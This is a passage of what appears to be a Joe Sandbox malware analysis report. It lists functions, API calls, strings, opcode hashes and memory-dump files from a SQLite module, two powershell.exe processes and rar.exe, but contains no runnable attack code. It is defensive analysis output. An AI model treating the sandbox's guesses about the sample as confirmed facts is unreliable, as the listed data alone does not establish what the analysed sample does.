Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 4149376297-3418467682
Opcode ID: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
Instruction ID: 89ec2cfeab9e83a2dcf34cb2ff04a8338baca004db55ddcb7b864c2abe4eb53a
Opcode Fuzzy Hash: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
Instruction Fuzzy Hash: 2541C132A2A74592EB608F15E0442B973A5FB84BD0F542035EB8D17798DF7CD901CB54

Function 00007FF8A8092C1C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8A8092C48
GetCurrentThreadId.KERNEL32 ref: 00007FF8A8092C56
GetCurrentProcessId.KERNEL32 ref: 00007FF8A8092C62
QueryPerformanceCounter.KERNEL32 ref: 00007FF8A8092C72

Memory Dump Source

Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true

Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
Instruction ID: f7288314af067362d91f0a091716ce699769590acabd034ea94e3c70b3bfd10e
Opcode Fuzzy Hash: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
Instruction Fuzzy Hash: 09111C36B15F0199EB008B61E8552A933A4FB597A8F440931DA6D86BA4DF7CD168C390

Function 00007FF8A8788C80 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FF8A878BC0B), ref: 00007FF8A8788FBB

Strings

BINARY, xrefs: 00007FF8A8788E91
out of memory, xrefs: 00007FF8A87891B8

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: BINARY$out of memory
API String ID: 4149376297-3971123528
Opcode ID: bc6f2a8bacecf9166252a7f7e7f55d6c87e171d9e6f9b78f67373de005e7e5be
Instruction ID: 824e2e7b92a7ba1e411f4e80c8043137eed6890c0d35355f2b7e4b1b226b78a3
Opcode Fuzzy Hash: bc6f2a8bacecf9166252a7f7e7f55d6c87e171d9e6f9b78f67373de005e7e5be
Instruction Fuzzy Hash: E8F1F372A4A686AAEB60CF15D4007B93BA1FB54BC4F444032DB8D47794EF3CE5A5C724

Function 00007FF8A878B5A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140(?,?,?,00000000,?,00007FF8A878BCA6,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF8A878B676
00007FF8BA251730.VCRUNTIME140(?,?,?,00000000,?,00007FF8A878BCA6,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF8A878B6DC

Strings

%s.xBestIndex malfunction, xrefs: 00007FF8A878B8EA

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s.xBestIndex malfunction
API String ID: 4149376297-3856629991
Opcode ID: 6031e0d52f8e623814c5ff78df03ce2a13dc1a347239105b5b64f6607da1d5c6
Instruction ID: 1b0a286a8272be5082826dd9c55fc1a58f4ddcccbd4917e0e160aa38e86e917d
Opcode Fuzzy Hash: 6031e0d52f8e623814c5ff78df03ce2a13dc1a347239105b5b64f6607da1d5c6
Instruction Fuzzy Hash: FDE1BF72A4AB52A6EB668F29D48077837A0FB48BD4F040136DA4D43764DF3CE4E1C768

Function 00007FF8A871F590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A871F78D

Strings

too many levels of trigger recursion, xrefs: 00007FF8A872106D
out of memory, xrefs: 00007FF8A87212EB

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: out of memory$too many levels of trigger recursion
API String ID: 4149376297-3387558265
Opcode ID: 779609525df14a454e6d8bc5e939ef047970eeec53fade6c015cf47684a8258e
Instruction ID: a427a51cd0af2d5ba76333f14472412334adcdb438eff7e1d2535aebe8bc2108
Opcode Fuzzy Hash: 779609525df14a454e6d8bc5e939ef047970eeec53fade6c015cf47684a8258e
Instruction Fuzzy Hash: 80713876A06B4596DB60CF19E484A6D77E8FB48784F164036DF8D83B60EF38E091C754

Function 00007FF8A8741030 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A874110E

Strings

cannot use RETURNING in a trigger, xrefs: 00007FF8A8741057
sqlite_returning, xrefs: 00007FF8A8741147

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: cannot use RETURNING in a trigger$sqlite_returning
API String ID: 4149376297-753984552
Opcode ID: 90345514c6722d7a683a32098103f8e468254a001aa006cc10f1c1805ec09e79
Instruction ID: 4041ac1a9a6ddf7edd20b79cc31e5ead3a4cf42e23bbba9ad0a0eee8b6f45572
Opcode Fuzzy Hash: 90345514c6722d7a683a32098103f8e468254a001aa006cc10f1c1805ec09e79
Instruction Fuzzy Hash: E9414131A8AB81A6EB699B65E5403B973A0FB48BC0F444131DBDE07756DF3CE461C329

Analysis Process: powershell.exePID: 2860, Parent PID: 744COMMON

Executed Functions

Function 00007FF847883027 Relevance: 1.0, Instructions: 1012COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 517ac9ebafce8b1c2b0735db7932b62ebe372f6a1262cfd0e749afc413252754
Instruction ID: e0d7d9a8b4dbfe919e9625e06d5d3de5eb801c0955b743428f28138ce5a12b30
Opcode Fuzzy Hash: 517ac9ebafce8b1c2b0735db7932b62ebe372f6a1262cfd0e749afc413252754
Instruction Fuzzy Hash: 61524432A0DB899FF396AA3C68551B97FE1EF56760B0A01FBC04CC7593ED189C068356

Function 00007FF8478867F5 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50bd76e1ff203ba439e03cf1f24e654266c042c9e0a407bd05ea42792136a90e
Instruction ID: 2142e1ef14caa2b78a598e959da18c134fe20357bcc393212f3e43f01fad38da
Opcode Fuzzy Hash: 50bd76e1ff203ba439e03cf1f24e654266c042c9e0a407bd05ea42792136a90e
Instruction Fuzzy Hash: A2D13031F1EA8ADFF7AAAB2858545B97FE1EF06390F0905BED04CCB193D918AC018355

Function 00007FF8477BA165 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3720870565de6f33cd03cc74158ae80d299c9d3afee50a65c23bc44c0e252e7d
Instruction ID: acd48fbec08dab437b6e0298e75f193c65e11daee86c9c9e1e569945c80503b0
Opcode Fuzzy Hash: 3720870565de6f33cd03cc74158ae80d299c9d3afee50a65c23bc44c0e252e7d
Instruction Fuzzy Hash: B741842290E7C58FD713AB3858754E83FB0EE9315874E05E7C8D8CF0A3E958582AC766

Function 00007FF8477B98A8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dec1822aa0fa9463e5cb5f9a0453694be2d30947f7fc30775cc5a626aa1c094
Instruction ID: 7adb8b6c4a9f1ab3d77550d243fd185227a5c9e1170f596855022df489bfbcf8
Opcode Fuzzy Hash: 7dec1822aa0fa9463e5cb5f9a0453694be2d30947f7fc30775cc5a626aa1c094
Instruction Fuzzy Hash: EB31953191CB4C9FDB58DB5CA8466B97BE0FB99721F00422FE449D3252CB71A8558BC2

Function 00007FF8477BA74C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0674f290082d72ce9d936ea8e0e0617bd12cbef028d9b127581c639b87678686
Instruction ID: 61399bfd152981237698ab5b086e2164b1477c9ea858c65d88d3dff0cb55d751
Opcode Fuzzy Hash: 0674f290082d72ce9d936ea8e0e0617bd12cbef028d9b127581c639b87678686
Instruction Fuzzy Hash: B221063090CB8C8FDB59EB6C9C4A7E97FF0EB66321F04416BD448C3152DA74A45ACB91

Function 00007FF84769E40A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2288851948.00007FF84769D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84769D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff84769d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55ef372afc8a0db17cc58a1afa4ea44d51d28f5b7f3922efe40924750b4db6f
Instruction ID: 8d6f39d3aa1fb2c29eeb851de2b90ba2b9adb0e5d668c46a3b54997ab4b8e1d3
Opcode Fuzzy Hash: e55ef372afc8a0db17cc58a1afa4ea44d51d28f5b7f3922efe40924750b4db6f
Instruction Fuzzy Hash: A401A23260CE08CFDAA8EB3DE48599677D1FB44364B1045AFD049CB1A6DA21F886CB81

Function 00007FF8477B33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 85808c2e6323d8f6b725429c4d996abc9f77871a40faad45032824a30f62a7d4
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 8001677111CB0C8FD744EF0CE451AB6B7E0FB95364F50056DE58AC3655DA36E882CB45

Function 00007FF8477BC0E2 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4fcb8c0089d593290028162b72d85ebfd221b8b74f7f9395bf90c80268880e
Instruction ID: 16a8ba9a8ec9f7960eceec9845f2ac8abec2a86868200111ab0ff30a4fa6aa91
Opcode Fuzzy Hash: 7e4fcb8c0089d593290028162b72d85ebfd221b8b74f7f9395bf90c80268880e
Instruction Fuzzy Hash: 2AF0303275C6044FDB4CAA1CF8429B573D1E799335B10026EE48BC2697D927E8438686

Function 00007FF8477BC128 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7e8708c4b441f2dde0b16e2d5b963ad3475aaeb78a056e98a051b9a0a1d4d2
Instruction ID: 89436d23a75a4ff406aa4a5aafaa1fcf8df88dc4b7995b8208d4ed20eb695e66
Opcode Fuzzy Hash: 5b7e8708c4b441f2dde0b16e2d5b963ad3475aaeb78a056e98a051b9a0a1d4d2
Instruction Fuzzy Hash: 41F0A03275C6088FDB4CAA0CF8029B873D0EB99320B10412EE48BC2297D927E8428685

Function 00007FF84788432D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8102a1d2bca71a661a71aa3bad188d0f8fbabffa9199f280030ff9313e7e07
Instruction ID: 231bf6e4992a010601cc632b5370fdf19bb2980b7374ecaa0540feb45216328d
Opcode Fuzzy Hash: 8f8102a1d2bca71a661a71aa3bad188d0f8fbabffa9199f280030ff9313e7e07
Instruction Fuzzy Hash: 6EF0BE32B0D606CFE669EE0CE4008A8B7E0FF8436071200BAE00DC70A3DA26EC40CB84

Function 00007FF84769E41C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2288851948.00007FF84769D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84769D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff84769d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ab7a4a66ba2294a96fd2e93c88522fbd618a6ea62a7648d9ae19f8cbc2293a
Instruction ID: 0fe4cb9243b2056562133d91d404fb919c88de21e32c1f2f497daa6801757f37
Opcode Fuzzy Hash: 74ab7a4a66ba2294a96fd2e93c88522fbd618a6ea62a7648d9ae19f8cbc2293a
Instruction Fuzzy Hash: E2F0F47151CE08CFCB98EF29C485E163BE1FB68354B210998D44ACB256D634E882CB80

Function 00007FF8478845E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579c9965734b586c742a29cefe68d0cee05d4fa8fdd40df939d1071b4c622de4
Instruction ID: b18602c7c5d71cee4436a098c1ea11d6cbb0e87e2d98c9acd1ade44fbe3e871c
Opcode Fuzzy Hash: 579c9965734b586c742a29cefe68d0cee05d4fa8fdd40df939d1071b4c622de4
Instruction Fuzzy Hash: CCF05E32A0D5458FE755EE5CE4414AC77E0EF4536171600B6E10EC7063DA26AC448B94

Non-executed Functions

Function 00007FF8477B851B Relevance: 6.3, Strings: 5, Instructions: 89COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FF8477B85C9
O_^, xrefs: 00007FF8477B852A
O_^, xrefs: 00007FF8477B856A
O_^, xrefs: 00007FF8477B850A
O_^, xrefs: 00007FF8477B857A

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^$O_^
API String ID: 0-2660881393
Opcode ID: 3c66b7a86964083922ec3cd1f42b5b61939325f257a6cdfb11c5d8cdd3d665b3
Instruction ID: 132efe9ec864cca71eb6937200dd91fec23e1c484258f0a88ed8437aec3f010c
Opcode Fuzzy Hash: 3c66b7a86964083922ec3cd1f42b5b61939325f257a6cdfb11c5d8cdd3d665b3
Instruction Fuzzy Hash: AB316156A0D6C19FD3475B3C28790E93FA0AE631AC30E10FBC4E98B263E9085417D769

Function 00007FF8477B86FA Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

O_^, xrefs: 00007FF8477B8722
O_^, xrefs: 00007FF8477B8772
O_^, xrefs: 00007FF8477B8712
O_^, xrefs: 00007FF8477B8762

Memory Dump Source

Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd

Similarity

API ID:
String ID: O_^$O_^$O_^$O_^
API String ID: 0-934926442
Opcode ID: 726c14e604a1a58b5ab13f5ca7d78c86332b69a8819991692d4bee53e326e7d2
Instruction ID: 3a7bb75e4bb1640687ffc1f23792283b7350d2750f555bef236ea424541f2ca2
Opcode Fuzzy Hash: 726c14e604a1a58b5ab13f5ca7d78c86332b69a8819991692d4bee53e326e7d2
Instruction Fuzzy Hash: 0A21A05690D2C68ED3536B392C690F83FD0AF2319DB4D01F2C5E88F193EE08185BC296

Analysis Process: powershell.exePID: 7908, Parent PID: 7756COMMON

Executed Functions

Function 00007FF8478917D9 Relevance: .8, Instructions: 786COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2201131509.00007FF847890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ff847890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e798afc55cbfb82f05328f84d747b532cdc2b63e27a03a3422f3bdaa1ebe23
Instruction ID: 5dee35ca85451ccb2b37c73dccc2f490c861a5bf2c4638caf74ab069b48d8783
Opcode Fuzzy Hash: 96e798afc55cbfb82f05328f84d747b532cdc2b63e27a03a3422f3bdaa1ebe23
Instruction Fuzzy Hash: 8E323571F0DB898FE796AB3858541B97FE2EF562A4B0801FBD04DC7193E9189C0AC356

Function 00007FF8477C4DC5 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2200559961.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ff8477c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db3466d979447704d4c1b8b6c00715e1833ca2fca828da3340d9841ba7cf7f59
Instruction ID: c8917085a946213c84b82c1c72d365596cb97e6f1ed2c856128c63469918ad5e
Opcode Fuzzy Hash: db3466d979447704d4c1b8b6c00715e1833ca2fca828da3340d9841ba7cf7f59
Instruction Fuzzy Hash: 9F710531E0CA498FEB55EB6CD8556ECBFF1EF49310F1440BED449D7296CA256842CB80

Function 00007FF8477C3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2200559961.00007FF8477C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_7ff8477c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: e7cee4b2ba115be1f43b0c07dcc42d4f6832ca0fc68a2a0ab0ce4e579f2bbcb6
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 4C01677111CB0C8FD744EF0CE451AB5B7E0FB99364F50056EE58AC3655D636E882CB46

Analysis Process: rar.exePID: 7616, Parent PID: 7620COMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1239
Total number of Limit Nodes:	44

Executed Functions

Function 00007FF7F7E954C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

+, xrefs: 00007FF7F7E96535
VER, xrefs: 00007FF7F7E95EBA
EML, xrefs: 00007FF7F7E95D6B
7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF7F7E95935
SFX, xrefs: 00007FF7F7E960CC
rar.log, xrefs: 00007FF7F7E95CE5
*.%ls, xrefs: 00007FF7F7E959AF
OFF, xrefs: 00007FF7F7E95E4B
SND, xrefs: 00007FF7F7E95D11
LOG, xrefs: 00007FF7F7E95CD0
default.sfx, xrefs: 00007FF7F7E960F4
stdin, xrefs: 00007FF7F7E9672D
*?., xrefs: 00007FF7F7E9598C
stdin, xrefs: 00007FF7F7E96236
NUL, xrefs: 00007FF7F7E95DB3
ERR, xrefs: 00007FF7F7E95D40

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: 5f46bedba4ec908d380c6190ba0fe4388caf2bb489ce7eafa6ab7e8208914796
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: 32C2937BA0C19281EB64BB2481441BDA7B2AF41794FD98137CA2F4A2C5DE6DE547C3F0

Function 00007FF7F7E81884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

q:, xrefs: 00007FF7F7E819DA
sfx, xrefs: 00007FF7F7E81884
rar, xrefs: 00007FF7F7E818AA
exe, xrefs: 00007FF7F7E81897
.ext, xrefs: 00007FF7F7E818C0
,6, xrefs: 00007FF7F7E82F83
BK, xrefs: 00007FF7F7E819C5
%s%s , xrefs: 00007FF7F7E82A46

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
